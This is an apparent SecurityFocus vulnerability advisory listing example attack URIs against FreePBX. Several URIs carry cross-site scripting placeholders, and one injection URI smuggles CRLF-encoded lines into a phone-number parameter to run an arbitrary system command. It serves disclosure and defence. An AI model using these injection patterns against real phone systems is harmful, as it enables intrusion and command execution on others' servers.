FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities

Attackers can exploit the cross-site scripting issues by enticing an unsuspecting victim to follow a malicious URI.

The following example input and URIs are available:

Cross-site scripting:

http://www.example.com//panel/index_amp.php?context=[XSS]
http://www.example.com//panel/flash/mypage.php?clid=[XSS]
http://www.example.com//panel/flash/mypage.php?clidname=[base64_encode(XSS)]
http://www.example.com//panel/dhtml/index.php?context=/../%00">[XSS]
http://www.example.com//admin/views/freepbx_reload.php/"</script>[XSS]
http://www.example.com//recordings/index.php?login='>[XSS]

Command Execution:

http://www.example.com//recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER] () from-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A

The following example exploits are available:

Command Execution:


 

Privacy Statement
Copyright 2010, SecurityFocus